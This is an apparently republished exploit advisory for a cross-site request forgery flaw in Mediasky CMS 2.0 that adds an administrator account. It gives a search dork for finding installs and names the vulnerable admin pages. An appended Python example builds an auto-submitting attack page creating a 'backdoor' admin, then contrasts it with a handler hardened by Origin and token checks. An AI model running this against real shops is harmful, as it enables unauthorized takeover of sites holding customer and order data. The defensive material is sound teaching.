
Published on September 15th, 2023 📆 | 2963 Views ⚑


Italia Mediasky CMS 2.0 Cross Site Request Forgery – Torchsec



====================================================================================================================================
| # Title : İtalia Mediasky CMS v2.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : Windows 10 Pro (French) / browser : Mozilla Firefox 63.0.3 (32-bit) |
| # Vendor : http://www.bereewineshop.com/admin/ |
| # Dork : Mediasky - Lato Amministrativo |
====================================================================================================================================

PoC :

[+] Dork in Google or another search engine for the string above to find installs.

[+] The HTML PoC creates a new admin user: it is a form posted to the admin-creation page that submits itself when a logged-in administrator opens it. The HTML source is not reproduced in this copy; only the rendered form that it submits follows.

[+] Go to lines 18 and 19 of the PoC HTML.

[+] Set the target site link there, save the changes and apply.

[+] Affected file : /admin/reginsuseradmin.php

[+] Affected file : /admin/visuseradmin.php




Rendered form submitted by the PoC (Italian labels kept, English gloss in parentheses):

INSERISCI USER ADMIN (insert admin user):

DETTAGLIO USER ADMIN (admin user details):
  Cognome (surname), Nome (first name), Tel.Fisso (landline), Cellulare (mobile), Indirizzo (address), Username, Password, Riscrivi Password (re-type password), Email, Attivo (active: si/No)

ELENCO PERMESSI ATTIVI PER SEZIONE (active permissions per section). Every item below carries the same five flags: VISUAL (view), INSER (insert), MODIF (modify), ARCHIV (archive), CANCEL (delete).

HOME (no per-item flags listed)

GESTIONE CONTENUTI (content management):
  Metatag Generici (generic meta tags), Pagine Web (web pages), Prodotti (products), Prodotti - Specifiche (specifications), Prodotti - Sezioni (sections), Prodotti - Produttori (producers), Prodotti - Recensioni (reviews), Prodotti - Denominazioni (designations), Prodotti - Provenienza (origin), Slideshow Immagini (image slideshow)

GESTIONE ORDINI (order management):
  Ordini da evadere (orders to fulfil), Ordini evasi (fulfilled orders), Tutti gli Ordini (all orders)

ANAGRAFICA CLIENTI (customer records):
  Clienti Privati (private customers), Clienti Aziendali (business customers), Tutti i Clienti (all customers)

STATISTICHE (statistics):
  Statistiche

GESTIONE BACKUP (backup management):
  Backup Istantaneo (instant backup), Backup automatico (automatic backup)

GESTIONE USER ADMIN (admin user management):
  User Admin

GESTIONE TROVAPREZZI (Trovaprezzi feed management):
  Genera File Trovaprezzi (generate Trovaprezzi file), Articoli Trovaprezzi (Trovaprezzi items)
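The following is an added example, not the advisory's PoC and not Mediasky code. It models the attack and the fix end to end so the issue can be exercised offline: build_csrf_poc() produces the kind of auto-submitting page the advisory describes (the target site link is the one thing it tells you to change), vulnerable_insert_admin() models a handler that trusts the session cookie alone, and hardened_insert_admin() is the same endpoint with an Origin/Referer check and a per-session synchronizer token. Assumptions: the form posts to /admin/reginsuseradmin.php (the advisory lists it as affected but does not show the form action), and every input name in ADMIN_FIELDS is invented, since the advisory shows only the Italian labels.

```python
import hmac
import secrets
from html import escape
from urllib.parse import urlsplit

# Constructed field names: the advisory shows only the form's Italian labels,
# so these input names are assumptions, not the CMS's real ones.
ADMIN_FIELDS = {
    "cognome": "Rossi",              # Cognome (surname)
    "nome": "Mario",                 # Nome (first name)
    "username": "backdoor",
    "password": "Passw0rd!",
    "ripassword": "Passw0rd!",       # Riscrivi Password (re-type password)
    "email": "attacker@example.com",
    "attivo": "si",                  # Attivo (active) si/No
}
INSERT_PATH = "/admin/reginsuseradmin.php"  # listed as affected in the advisory


def build_csrf_poc(target_base: str, fields: dict) -> str:
    """Build the attacker page: a hidden form posted to the admin-creation
    endpoint that submits itself as soon as the page loads. The victim's
    browser attaches the victim's admin session cookie automatically; that is
    the whole attack. target_base is the 'target site link' the advisory
    says to edit."""
    action = escape(target_base.rstrip("/") + INSERT_PATH)
    inputs = "\n".join(
        f'  <input type="hidden" name="{escape(k)}" value="{escape(v)}">'
        for k, v in fields.items()
    )
    return (
        '<html><body onload="document.forms[0].submit()">\n'
        f'<form method="POST" action="{action}">\n{inputs}\n</form>\n'
        "</body></html>"
    )


# --- a model of the server side (constructed, not the CMS's code) -----------
SESSIONS = {"s3ss10n": "admin"}   # session cookie -> logged-in admin
TOKENS = {}                       # session cookie -> synchronizer token


def issue_csrf_token(session_id: str) -> str:
    """Called when the legitimate 'INSERISCI USER ADMIN' form is rendered;
    the token goes into a hidden field the attacker's page cannot read."""
    TOKENS[session_id] = secrets.token_hex(16)
    return TOKENS[session_id]


def vulnerable_insert_admin(request: dict, users: set) -> int:
    """Behaviour the advisory describes: a valid session cookie is the only
    check, so a POST triggered from any web page creates the user."""
    if request.get("cookie") not in SESSIONS:
        return 302                      # not logged in: bounce to login
    users.add(request["form"]["username"])
    return 200


def _same_origin(url: str, allowed: str) -> bool:
    a, b = urlsplit(url), urlsplit(allowed)
    return (a.scheme, a.netloc) == (b.scheme, b.netloc)


def hardened_insert_admin(request: dict, users: set, site_origin: str) -> int:
    """Same endpoint with two independent CSRF defences."""
    sid = request.get("cookie")
    if sid not in SESSIONS:
        return 302
    # 1. Origin (Referer as fallback) must be our own site. A cross-site form
    #    post carries the attacker's origin; a request with neither header is
    #    rejected rather than trusted.
    source = request.get("origin") or request.get("referer")
    if not source or not _same_origin(source, site_origin):
        return 403
    # 2. Synchronizer token bound to the session, compared in constant time.
    expected = TOKENS.get(sid)
    supplied = request["form"].get("csrf_token", "")
    if expected is None or not hmac.compare_digest(expected, supplied):
        return 403
    users.add(request["form"]["username"])
    return 200


if __name__ == "__main__":
    created = set()
    forged = {"cookie": "s3ss10n", "origin": "http://attacker.example",
              "form": dict(ADMIN_FIELDS)}
    print("vulnerable:", vulnerable_insert_admin(forged, created), created)
    print("hardened  :", hardened_insert_admin(forged, set(), "https://shop.example"))
    print(build_csrf_poc("https://shop.example", ADMIN_FIELDS))
```

The forged request carries the admin's cookie (the browser adds it), so the vulnerable handler creates the user; the hardened one refuses it on the Origin check and, even if that header were missing or spoofable, on the token the attacker's page never saw. A SameSite=Lax or Strict attribute on the admin session cookie is a cheap third layer, but the token check is the one that does not depend on browser behaviour.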

Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================
